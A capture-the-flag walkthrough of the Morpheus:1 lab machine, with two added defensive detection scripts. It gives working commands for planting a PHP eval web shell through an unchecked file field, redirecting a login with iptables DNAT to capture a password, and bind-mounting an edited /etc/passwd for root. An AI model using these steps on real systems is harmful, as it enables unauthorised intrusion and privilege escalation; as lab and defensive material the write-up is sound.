Preface #
I wrote about this machine in an earlier post, but that was not the intended route, so here I go through it again from the start.
Nmap #
[root@Hacking] /home/kali/Matrix
❯ nmap 192.168.237.173 -A -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-30 09:07 CST
Nmap scan report for 192.168.237.173
Host is up (0.00032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_ 256 aa:83:c3:51:78:61:70:e5:b7:46:9f:07:c4:ba:31:e4 (ECDSA)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Morpheus:1
81/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Meeting Place
|_http-title: 401 Authorization Required
Feroxbuster #
[root@Hacking] /home/kali/Matrix
❯ feroxbuster -u 'http://192.168.237.173/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.237.173/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [txt, php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 175l 1014w 78508c http://192.168.237.173/trinity.jpeg
200 GET 15l 45w 348c http://192.168.237.173/
301 GET 9l 28w 323c http://192.168.237.173/javascript => http://192.168.237.173/javascript/
200 GET 1l 7w 47c http://192.168.237.173/robots.txt
200 GET 4l 27w 139c http://192.168.237.173/graffiti.txt
200 GET 24l 56w 451c http://192.168.237.173/graffiti.php
301 GET 9l 28w 330c http://192.168.237.173/javascript/jquery => http://192.168.237.173/javascript/jquery/
200 GET 10870l 44283w 287600c http://192.168.237.173/javascript/jquery/jquery
[####################] - 3m 1984956/1984956 0s found:8 errors:0
[####################] - 3m 661638/661638 4125/s http://192.168.237.173/
[####################] - 3m 661638/661638 3743/s http://192.168.237.173/javascript/
[####################] - 3m 661638/661638 4219/s http://192.168.237.173/javascript/jquery/
Two files stand out: graffiti.txt and graffiti.php.
www-data #
[root@Hacking] /home/kali/Matrix
❯ curl -X POST 'http://192.168.237.173/graffiti.php' -d 'message=<?php eval($_POST[a]);?>&file=shell.php'
<h1>
<center>
Nebuchadnezzar Graffiti Wall
</center>
</h1>
<p>
<?php eval($_POST[a]);?>
<br>
<br>
<p>
Enter message:
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>
The write succeeds: the file field, which the form normally sends as a hidden input set to graffiti.txt, is taken straight from the request, so the posted message is written to shell.php instead.
FLAG 1 #
www-data@morpheus:/$ cat FLAG.txt
Flag 1!
You've gotten onto the system. Now why has Cypher locked everyone out of it?
Can you find a way to get Cypher's password? It seems like he gave it to
Agent Smith, so Smith could figure out where to meet him.
Also, pull this image from the webserver on port 80 to get a flag.
/.cypher-neo.png
The png does not seem to contain anything. In the cron jobs there is a chown command that recursively sets the owner of /crew to root every minute:
www-data@morpheus:/$ cat /etc/cron.d/fix-ownership-on-crew
* * * * * root chown -R root /crew
Linpeas #
Running linpeas shows that a Docker environment is present, but the other host, 172.17.0.2, has no ports open.
/usr/sbin/xtables-legacy-multi
is a multi-call binary: a single entry point that bundles iptables, ip6tables and the rule save/restore tools. In other words, it can drive any of the tools in that list.
iptables
is the Linux firewall tool, used to configure the kernel's packet filtering rules. It lets you control which traffic may enter or leave the system, and it also controls forwarding.
Going back to the earlier port scan: port 81 runs a service behind HTTP authentication, so it is reasonable to guess that someone logs in on port 81, and that we can forward that traffic somewhere we can see it.
iptables #
Normally www-data cannot read the iptables rules at all, but here it can list them, and can even modify them.
www-data@morpheus:/tmp$ iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy DROP)
target prot opt source destination
DOCKER-USER all -- anywhere anywhere
DOCKER-ISOLATION-STAGE-1 all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED
DOCKER all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain DOCKER (1 references)
target prot opt source destination
Chain DOCKER-ISOLATION-STAGE-1 (1 references)
target prot opt source destination
DOCKER-ISOLATION-STAGE-2 all -- anywhere anywhere
RETURN all -- anywhere anywhere
Chain DOCKER-ISOLATION-STAGE-2 (1 references)
target prot opt source destination
DROP all -- anywhere anywhere
RETURN all -- anywhere anywhere
Chain DOCKER-USER (1 references)
target prot opt source destination
RETURN all -- anywhere anywhere
So the traffic can simply be redirected to another local port and listened on there.
DNAT is needed here to rewrite the packets' destination address. Given the Docker environment found earlier, the packets are presumably sent from 172.17.0.2 to 172.17.0.1.
iptables -A FORWARD -p tcp -d 172.17.0.1 --dport 81 -j ACCEPT
iptables -A PREROUTING -t nat -i docker0 -p tcp --dport 81 -j DNAT --to 172.17.0.1:8080
cypher:cache-prosy-proceeds-clue-expiate-ammo-pugilist
Flag obtained.
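From the defender's side, the hand-inserted DNAT rule above can be picked out of iptables-save output: Docker keeps its own port-publishing DNAT rules in the DOCKER chain, so a DNAT rule sitting directly in PREROUTING, especially one that turns traffic arriving on docker0 back to the bridge gateway, is worth an alert. This check is an added example, not part of this write-up; its sample rules and the 172.17.0.1 gateway are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed `iptables-save` excerpt (not captured from the box): Docker's own
# published-port rule in the DOCKER chain, plus a hand-added PREROUTING DNAT
# of the same shape as the rule used in this write-up.
SAMPLE_SAVE = """\
*nat
:PREROUTING ACCEPT [0:0]
:DOCKER - [0:0]
-A PREROUTING -m addrtype --dst-type LOCAL -j DOCKER
-A PREROUTING -i docker0 -p tcp -m tcp --dport 81 -j DNAT --to-destination 172.17.0.1:8080
-A DOCKER ! -i docker0 -p tcp -m tcp --dport 8081 -j DNAT --to-destination 172.17.0.2:81
COMMIT
"""

DNAT_RE = re.compile(r"^-A (?P<chain>\S+) (?P<body>.*) -j DNAT --to-destination (?P<to>\S+)$")

@dataclass
class DnatRule:
    chain: str
    in_iface: Optional[str]   # interface matched with -i (None if negated or absent)
    dport: Optional[str]
    to: str

def parse_dnat_rules(save_text: str) -> List[DnatRule]:
    """Return every DNAT rule in the nat table of iptables-save output."""
    rules, table = [], None
    for line in save_text.splitlines():
        if line.startswith("*"):
            table = line[1:]
            continue
        m = DNAT_RE.match(line) if table == "nat" else None
        if not m:
            continue
        body = m.group("body")
        iface = re.search(r"(?<!! )-i (\S+)", body)      # skip "! -i X" negations
        dport = re.search(r"--dport (\S+)", body)
        rules.append(DnatRule(m.group("chain"), iface and iface.group(1),
                              dport and dport.group(1), m.group("to")))
    return rules

def suspicious_dnat(rules: List[DnatRule], managed=("DOCKER",), gateway="172.17.0.1"):
    """Flag DNAT rules outside Docker-managed chains, and any rule that sends
    docker0 ingress back to the bridge gateway (interception, not port publishing)."""
    return [r for r in rules
            if r.chain not in managed or (r.in_iface == "docker0" and r.to.startswith(gateway + ":"))]
```

Feed it the output of iptables-save from a cron job or an agent and alert on a non-empty result; the rule in the DOCKER chain is not flagged, the PREROUTING one is.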
Root #
Checking the groups shows a humans group, and the /crew directory seen earlier also belongs to humans.
cypher@morpheus:~$ id
uid=1001(cypher) gid=1001(cypher) groups=1001(cypher),1002(humans)
cypher@morpheus:~$ ls -al /crew/
total 8
drwxrwxr-x 2 root humans 4096 Oct 28 2021 .
drwxr-xr-x 19 root root 4096 Oct 28 2021 ..
Even if a SUID bit were set on a file in advance, the chown would strip it again. The python3.9 binary noticed earlier, however, looks usable.
Prepare a new passwd file; I only changed the UID and GID on the last line so that cypher becomes equivalent to root.
cypher@morpheus:~$ cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nginx:x:999:999:nginx:/var/nginx:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
uuidd:x:102:102::/run/uuidd:/usr/sbin/nologin
tcpdump:x:103:103::/nonexistent:/usr/sbin/nologin
_chrony:x:104:104:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
systemd-network:x:105:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:106:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
trinity:x:1000:1000::/home/trinity:/bin/bash
cypher:x:0:0::/root:/bin/bash
Then write a Python script:
import ctypes
import os
# Call mount(2) through libc and bind the edited passwd file over /etc/passwd in place.
libc = ctypes.CDLL("libc.so.6", use_errno=True)
libc.mount.argtypes = (ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_ulong, ctypes.c_char_p)
libc.mount.restype = ctypes.c_int
MS_BIND = 4096                      # value of MS_BIND from <sys/mount.h>
source = b"/home/cypher/passwd"     # the edited copy shown above
target = b"/etc/passwd"
filesystemtype = b"none"            # ignored for a bind mount
options = b"rw"
mountflags = MS_BIND
# mount() returns 0 on success; otherwise report errno instead of failing silently
if libc.mount(source, target, filesystemtype, mountflags, options) != 0:
    err = ctypes.get_errno()
    raise OSError(err, os.strerror(err))
The change can be seen to have taken effect.
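From the defender's side, the bind mount the script above performs leaves a visible trace: /proc/self/mountinfo gains an entry whose mount point is /etc/passwd and whose root field names the file that now shadows it. The check below is an added example, not part of this write-up; its mountinfo lines are constructed.

```python
import re
from typing import Dict, List

# Files that should never have a mount sitting on top of them.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/etc/group", "/etc/sudoers", "/etc/ld.so.preload")

# Constructed /proc/self/mountinfo excerpt (not captured from the box): the root
# filesystem plus the bind mount that the script above creates.
SAMPLE_MOUNTINFO = """\
22 28 0:21 / /proc rw,nosuid,nodev,noexec,relatime shared:12 - proc proc rw
28 0 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro
95 28 8:1 /home/cypher/passwd /etc/passwd rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro
"""

def _unescape(field: str) -> str:
    # mountinfo escapes space, tab, newline and backslash as \ooo octal sequences
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)

def parse_mountinfo(text: str) -> List[Dict[str, str]]:
    """Parse mountinfo lines. Fields before ' - ' are positional (the number of
    optional fields such as shared:N varies); fstype and source follow it."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pre, _, post = line.partition(" - ")
        p, q = pre.split(), post.split()
        entries.append({"root": _unescape(p[3]), "mount_point": _unescape(p[4]),
                        "fstype": q[0], "source": _unescape(q[1])})
    return entries

def find_overlaid_files(text: str, sensitive=SENSITIVE_PATHS) -> List[Dict[str, str]]:
    """Return mounts whose mount point is a sensitive file. A bind mount of a
    subpath shows up with root != '/', so the file the kernel now serves for
    /etc/passwd can be read straight from the 'root' field."""
    return [e for e in parse_mountinfo(text) if e["mount_point"] in sensitive]
```

On a live host, read /proc/self/mountinfo instead of the sample; findmnt /etc/passwd gives the same answer interactively.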